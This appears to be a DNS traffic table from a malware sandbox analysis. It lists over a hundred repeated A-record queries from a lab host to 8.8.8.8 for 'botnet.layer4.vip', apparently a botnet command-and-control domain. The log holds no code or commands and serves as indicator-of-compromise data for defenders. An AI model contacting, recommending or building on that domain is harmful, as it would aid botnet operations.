                                  Apr 9, 2023 03:30:34.597347975 CEST192.168.2.238.8.8.80x9eacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.613375902 CEST192.168.2.238.8.8.80x9eacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.629116058 CEST192.168.2.238.8.8.80xe714Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.653601885 CEST192.168.2.238.8.8.80xe714Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.669167995 CEST192.168.2.238.8.8.80xe714Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.685146093 CEST192.168.2.238.8.8.80xe714Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.711802006 CEST192.168.2.238.8.8.80xe714Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.727998972 CEST192.168.2.238.8.8.80x262dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.752435923 CEST192.168.2.238.8.8.80x262dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.768210888 CEST192.168.2.238.8.8.80x262dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.792368889 CEST192.168.2.238.8.8.80x262dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.816368103 CEST192.168.2.238.8.8.80x262dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.840588093 CEST192.168.2.238.8.8.80x4416Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.864975929 CEST192.168.2.238.8.8.80x4416Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.880878925 CEST192.168.2.238.8.8.80x4416Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.896796942 CEST192.168.2.238.8.8.80x4416Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.912369967 CEST192.168.2.238.8.8.80x4416Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.928354979 CEST192.168.2.238.8.8.80xbeb1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.943962097 CEST192.168.2.238.8.8.80xbeb1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.968101978 CEST192.168.2.238.8.8.80xbeb1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.983764887 CEST192.168.2.238.8.8.80xbeb1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.008225918 CEST192.168.2.238.8.8.80xbeb1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.032849073 CEST192.168.2.238.8.8.80xab95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.056992054 CEST192.168.2.238.8.8.80xab95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.081464052 CEST192.168.2.238.8.8.80xab95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.097359896 CEST192.168.2.238.8.8.80xab95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.121391058 CEST192.168.2.238.8.8.80xab95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.137191057 CEST192.168.2.238.8.8.80x4a22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.162040949 CEST192.168.2.238.8.8.80x4a22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.177699089 CEST192.168.2.238.8.8.80x4a22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.193355083 CEST192.168.2.238.8.8.80x4a22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.209043026 CEST192.168.2.238.8.8.80x4a22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.234791994 CEST192.168.2.238.8.8.80x6ab4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.251075029 CEST192.168.2.238.8.8.80x6ab4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.275899887 CEST192.168.2.238.8.8.80x6ab4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.300007105 CEST192.168.2.238.8.8.80x6ab4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.324147940 CEST192.168.2.238.8.8.80x6ab4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.348642111 CEST192.168.2.238.8.8.80x447Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.373136044 CEST192.168.2.238.8.8.80x447Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.397414923 CEST192.168.2.238.8.8.80x447Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.421849012 CEST192.168.2.238.8.8.80x447Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.437525988 CEST192.168.2.238.8.8.80x447Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.462212086 CEST192.168.2.238.8.8.80x6f51Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.477885008 CEST192.168.2.238.8.8.80x6f51Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.502104044 CEST192.168.2.238.8.8.80x6f51Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.517743111 CEST192.168.2.238.8.8.80x6f51Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.542289019 CEST192.168.2.238.8.8.80x6f51Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.566883087 CEST192.168.2.238.8.8.80xc532Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.591227055 CEST192.168.2.238.8.8.80xc532Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.615444899 CEST192.168.2.238.8.8.80xc532Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.631062984 CEST192.168.2.238.8.8.80xc532Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.655486107 CEST192.168.2.238.8.8.80xc532Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.671211958 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.710705042 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.726790905 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.751005888 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.775338888 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.791464090 CEST192.168.2.238.8.8.80x7853Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.815612078 CEST192.168.2.238.8.8.80x7853Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.839967012 CEST192.168.2.238.8.8.80x7853Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.855758905 CEST192.168.2.238.8.8.80x7853Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.880002975 CEST192.168.2.238.8.8.80x7853Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.904537916 CEST192.168.2.238.8.8.80x5140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.920377970 CEST192.168.2.238.8.8.80x5140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.944468975 CEST192.168.2.238.8.8.80x5140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.960869074 CEST192.168.2.238.8.8.80x5140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.976372004 CEST192.168.2.238.8.8.80x5140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.000897884 CEST192.168.2.238.8.8.80x2c67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.016498089 CEST192.168.2.238.8.8.80x2c67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.040689945 CEST192.168.2.238.8.8.80x2c67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.056428909 CEST192.168.2.238.8.8.80x2c67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.072359085 CEST192.168.2.238.8.8.80x2c67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.088520050 CEST192.168.2.238.8.8.80xcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.113481045 CEST192.168.2.238.8.8.80xcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.129417896 CEST192.168.2.238.8.8.80xcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.145479918 CEST192.168.2.238.8.8.80xcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.169626951 CEST192.168.2.238.8.8.80xcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.194272041 CEST192.168.2.238.8.8.80xd073Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.210067034 CEST192.168.2.238.8.8.80xd073Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.234647036 CEST192.168.2.238.8.8.80xd073Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.259296894 CEST192.168.2.238.8.8.80xd073Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.274966955 CEST192.168.2.238.8.8.80xd073Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.299283028 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.324742079 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.340681076 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.365268946 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.390010118 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.414366961 CEST192.168.2.238.8.8.80x7a09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.438947916 CEST192.168.2.238.8.8.80x7a09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.463426113 CEST192.168.2.238.8.8.80x7a09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.479032040 CEST192.168.2.238.8.8.80x7a09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.503110886 CEST192.168.2.238.8.8.80x7a09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.519155979 CEST192.168.2.238.8.8.80x743bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.535047054 CEST192.168.2.238.8.8.80x743bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.550611019 CEST192.168.2.238.8.8.80x743bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.566339016 CEST192.168.2.238.8.8.80x743bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.581787109 CEST192.168.2.238.8.8.80x743bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.597867966 CEST192.168.2.238.8.8.80xd456Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.622154951 CEST192.168.2.238.8.8.80xd456Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.638114929 CEST192.168.2.238.8.8.80xd456Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.662954092 CEST192.168.2.238.8.8.80xd456Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.679090977 CEST192.168.2.238.8.8.80xd456Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.694932938 CEST192.168.2.238.8.8.80x293aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.719252110 CEST192.168.2.238.8.8.80x293aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.735106945 CEST192.168.2.238.8.8.80x293aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.759362936 CEST192.168.2.238.8.8.80x293aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.775448084 CEST192.168.2.238.8.8.80x293aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.791656017 CEST192.168.2.238.8.8.80xf538Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.807703972 CEST192.168.2.238.8.8.80xf538Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.823288918 CEST192.168.2.238.8.8.80xf538Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.847778082 CEST192.168.2.238.8.8.80xf538Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.872276068 CEST192.168.2.238.8.8.80xf538Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.896925926 CEST192.168.2.238.8.8.80xd8b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.912889004 CEST192.168.2.238.8.8.80xd8b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.928659916 CEST192.168.2.238.8.8.80xd8b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.952841043 CEST192.168.2.238.8.8.80xd8b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.968735933 CEST192.168.2.238.8.8.80xd8b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.993623018 CEST192.168.2.238.8.8.80x7f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.009414911 CEST192.168.2.238.8.8.80x7f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.025176048 CEST192.168.2.238.8.8.80x7f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.049688101 CEST192.168.2.238.8.8.80x7f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.073761940 CEST192.168.2.238.8.8.80x7f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.099438906 CEST192.168.2.238.8.8.80x97e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.115161896 CEST192.168.2.238.8.8.80x97e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.131158113 CEST192.168.2.238.8.8.80x97e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.155616999 CEST192.168.2.238.8.8.80x97e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.179996967 CEST192.168.2.238.8.8.80x97e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.205940008 CEST192.168.2.238.8.8.80xc80aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.232285976 CEST192.168.2.238.8.8.80xc80aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.247966051 CEST192.168.2.238.8.8.80xc80aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.272315979 CEST192.168.2.238.8.8.80xc80aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.296796083 CEST192.168.2.238.8.8.80xc80aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.312438011 CEST192.168.2.238.8.8.80xb0f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.328169107 CEST192.168.2.238.8.8.80xb0f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.352591038 CEST192.168.2.238.8.8.80xb0f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.379162073 CEST192.168.2.238.8.8.80xb0f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.394867897 CEST192.168.2.238.8.8.80xb0f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.410892010 CEST192.168.2.238.8.8.80x4591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.435157061 CEST192.168.2.238.8.8.80x4591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.459577084 CEST192.168.2.238.8.8.80x4591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.484118938 CEST192.168.2.238.8.8.80x4591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.501597881 CEST192.168.2.238.8.8.80x4591Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.526370049 CEST192.168.2.238.8.8.80xef20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.542515993 CEST192.168.2.238.8.8.80xef20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.558207035 CEST192.168.2.238.8.8.80xef20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.574331045 CEST192.168.2.238.8.8.80xef20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.598818064 CEST192.168.2.238.8.8.80xef20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.614696980 CEST192.168.2.238.8.8.80xa299Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.639183044 CEST192.168.2.238.8.8.80xa299Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.663491011 CEST192.168.2.238.8.8.80xa299Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.679100037 CEST192.168.2.238.8.8.80xa299Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.712418079 CEST192.168.2.238.8.8.80xa299Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.737443924 CEST192.168.2.238.8.8.80x6b62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.753287077 CEST192.168.2.238.8.8.80x6b62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.777858019 CEST192.168.2.238.8.8.80x6b62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.802439928 CEST192.168.2.238.8.8.80x6b62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.826687098 CEST192.168.2.238.8.8.80x6b62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.842540979 CEST192.168.2.238.8.8.80x7bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.858237982 CEST192.168.2.238.8.8.80x7bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.882949114 CEST192.168.2.238.8.8.80x7bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.898504972 CEST192.168.2.238.8.8.80x7bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.914083958 CEST192.168.2.238.8.8.80x7bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.938456059 CEST192.168.2.238.8.8.80x7366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.962790966 CEST192.168.2.238.8.8.80x7366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.979701042 CEST192.168.2.238.8.8.80x7366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.003999949 CEST192.168.2.238.8.8.80x7366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.028676987 CEST192.168.2.238.8.8.80x7366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.053143978 CEST192.168.2.238.8.8.80xab8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.069071054 CEST192.168.2.238.8.8.80xab8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.093691111 CEST192.168.2.238.8.8.80xab8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.109316111 CEST192.168.2.238.8.8.80xab8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.133724928 CEST192.168.2.238.8.8.80xab8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.149596930 CEST192.168.2.238.8.8.80x4522Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.165405989 CEST192.168.2.238.8.8.80x4522Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.181359053 CEST192.168.2.238.8.8.80x4522Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.205678940 CEST192.168.2.238.8.8.80x4522Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.221792936 CEST192.168.2.238.8.8.80x4522Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.247217894 CEST192.168.2.238.8.8.80x1ebbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.272944927 CEST192.168.2.238.8.8.80x1ebbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.298633099 CEST192.168.2.238.8.8.80x1ebbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.325596094 CEST192.168.2.238.8.8.80x1ebbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.342915058 CEST192.168.2.238.8.8.80x1ebbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.368768930 CEST192.168.2.238.8.8.80x530bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.385801077 CEST192.168.2.238.8.8.80x530bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.411525965 CEST192.168.2.238.8.8.80x530bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.428652048 CEST192.168.2.238.8.8.80x530bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.447716951 CEST192.168.2.238.8.8.80x530bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.473869085 CEST192.168.2.238.8.8.80x7deaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.498447895 CEST192.168.2.238.8.8.80x7deaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.524311066 CEST192.168.2.238.8.8.80x7deaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.541676998 CEST192.168.2.238.8.8.80x7deaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.558914900 CEST192.168.2.238.8.8.80x7deaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.583762884 CEST192.168.2.238.8.8.80xc10eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.608179092 CEST192.168.2.238.8.8.80xc10eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.632483006 CEST192.168.2.238.8.8.80xc10eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.648145914 CEST192.168.2.238.8.8.80xc10eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.663836002 CEST192.168.2.238.8.8.80xc10eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.688324928 CEST192.168.2.238.8.8.80x176eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
